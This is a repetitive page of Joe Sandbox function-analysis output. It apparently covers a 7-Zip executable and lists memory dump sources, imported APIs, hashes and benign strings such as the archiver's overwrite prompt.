                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memsetstrlen$fputs
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2256168112-2735817509
                                                                                                                                                                                                                                                                            • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                                                                                            • Instruction ID: 317fb833533d20ca89dfeae05a6246fda5eb02b5ca8eea66f899cface762fe85
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E04109623047C195CB74FB29E4603AEA763F785B84F485526EE8A07719CE7CC999CF04
                                                                                                                                                                                                                                                                            Function 00669828 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastfree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2167247754-0
                                                                                                                                                                                                                                                                            • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                                                                                            • Instruction ID: b33d6aaa9a8430536ea8256c22b0469e1e58ad5dffda8ddfab26746ae5b41b4f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3141CC3121898045CA60EB24E4913AEB366F7D2764F54032AEFED437D9DF34C94AD718
                                                                                                                                                                                                                                                                            Function 00666A04 Relevance: 9.1, APIs: 6, Instructions: 74fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$FileMove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 288606353-0
                                                                                                                                                                                                                                                                            • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                                                                                            • Instruction ID: 74ff2e84763763b4de180a54099aaf74ee7918d022fa480276d114956eef751c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C11E73330455145CA60EFA5F8602BB97229BC3BD0F045225FFAA673A5DE29CC86CA44
                                                                                                                                                                                                                                                                            Function 00667B70 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0066794C: FindClose.KERNELBASE ref: 0066795E
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 00667BAA
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 00667BB9
                                                                                                                                                                                                                                                                            • FindFirstStreamW.KERNELBASE ref: 00667BDB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00667BEA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4071060300-0
                                                                                                                                                                                                                                                                            • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                                                                                            • Instruction ID: 14ee2d9575d8d7fde7c5cc2c89b1b4b512cc7cc7847c3441ec05c2713d9c9e9b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C621A732208B8085DA60AF65E4543A96362FB86778F545320DEBA437D4DF3DCA49C701
                                                                                                                                                                                                                                                                            Function 006A7D84 Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A7DA9
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A7DB2
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A7DE5
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A7DF2
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A7DFB
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 006894DB
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 006894E3
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 006894F0
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 0068951C
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 00689525
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 0068952D
                                                                                                                                                                                                                                                                              • Part of subcall function 006894A8: free.MSVCRT ref: 0068953A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: l}j
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-2306499755
                                                                                                                                                                                                                                                                            • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                                                                                            • Instruction ID: fc9864ddfa3bb3c2420dfb5db769c5e0f0945996baecabd70405ea471b654e7e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6018F73706D4489CB51BF25DC612A86326EB87FA4F180225EF1D5B355EF21CC92C384
                                                                                                                                                                                                                                                                            Function 006ACCF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 006ACD2A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputsfree
                                                                                                                                                                                                                                                                            • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                                                                                                                                                                                                                                                            • API String ID: 2581285248-171671738
                                                                                                                                                                                                                                                                            • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                                                                                            • Instruction ID: 661e6edb1b9fcdd239dee921fef810d1a521c37f38442c76c48bdb238243a2b0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0131C72220894587EB30BB18D4A53B92763F7967B4F480136EB5E073A9CB1DCCA6DF11
                                                                                                                                                                                                                                                                            Function 006611B8 Relevance: 8.8, APIs: 7, Instructions: 84COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                                                            • Instruction ID: a0b27e53d9909de8d70b53be10de602175bff8e40ee2d1d8847bf1f23801a7e7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921DC7321594051CFA0EF25E46119EA722EBC37D4F441225FF5E977A9DF28C686C704
                                                                                                                                                                                                                                                                            Function 006A64C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$fputc
                                                                                                                                                                                                                                                                            • String ID: Time =
                                                                                                                                                                                                                                                                            • API String ID: 1185151155-458291097
                                                                                                                                                                                                                                                                            • Opcode ID: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                                                                                                                                                            • Instruction ID: 3a6193df45f50f5146dd023d983c4a6a9476e60cb5991c2879ebb4b505663d38
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE218E99740A1185FB08BF5AE89036A5363E789FC4F0CE035EE1E577A8DE29C866C740
                                                                                                                                                                                                                                                                            Function 0069F69C Relevance: 8.8, APIs: 7, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 202075352-0
                                                                                                                                                                                                                                                                            • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                                                            • Instruction ID: 7eac93ae7e32fdf67d5744ebf0f1d58e3025aabeb800d7a74911702557a52f79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C21C173220A5486CB60EF66E44166C7322F342BE5F9013269F2957AA8DF35D856CB04
                                                                                                                                                                                                                                                                            Function 0068D078 Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                                                            • Instruction ID: 22d884832c1c799cf8eb54c4799abbf783817841bd4f7f8c54430f104c2a8a1b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD113073206D8085CB50AF35D8616696321EB87FA8F1843759F6D677D5CE20C847C318
                                                                                                                                                                                                                                                                            Function 006894A8 Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                                                            • Instruction ID: 5fc1e9b1a9aea290f6ae5b91018673941ac3d8503f72c48199c69a625df1c731
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C015273705D80898B61FE36DD61168A322AB96FA871D0269EF2D2B799DE20C8428354
                                                                                                                                                                                                                                                                            Function 0069ECDC Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                                                            • Instruction ID: 97b55daa296d42cc42cb554b3900d76f22a128b9ff91f711421bd9496b5d7af1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13116173706D4085CB60EF35D86066D6311EB83FA4F084275AF6D6B7E9CE20C846C304
                                                                                                                                                                                                                                                                            Function 006A6B3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A6B7C
                                                                                                                                                                                                                                                                              • Part of subcall function 00666618: FormatMessageW.KERNEL32 ref: 00666676
                                                                                                                                                                                                                                                                              • Part of subcall function 00666618: LocalFree.KERNEL32 ref: 00666698
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 0066237E
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: fputs.MSVCRT ref: 006623B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 006623C4
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A6BAE
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A6BCC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputsfree$FormatFreeLocalMessagefputc
                                                                                                                                                                                                                                                                            • String ID: : $----------------
                                                                                                                                                                                                                                                                            • API String ID: 1215563195-4071417161
                                                                                                                                                                                                                                                                            • Opcode ID: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                                                                                                                                                                                                                            • Instruction ID: 6f03cf951d6964f0c56c3293c6b09a3e9b02b2352ba772e8a55f492e4f3a051a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB01C8B230090185DB10EF66E89072E3322F785BE4F188225EF6E433A4CF38D856C740
                                                                                                                                                                                                                                                                            Function 006A430C Relevance: 8.8, APIs: 7, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                                                            • Instruction ID: e224b4e831b28cb6176cfe35c23b8ee7aba98ec5f32a96e34a7363542812f4cb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33F03173719C5185CB51FF36DC6116CA322AB87FD57194165AF1D6B395CE20CC438384
                                                                                                                                                                                                                                                                            Function 006ABCA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
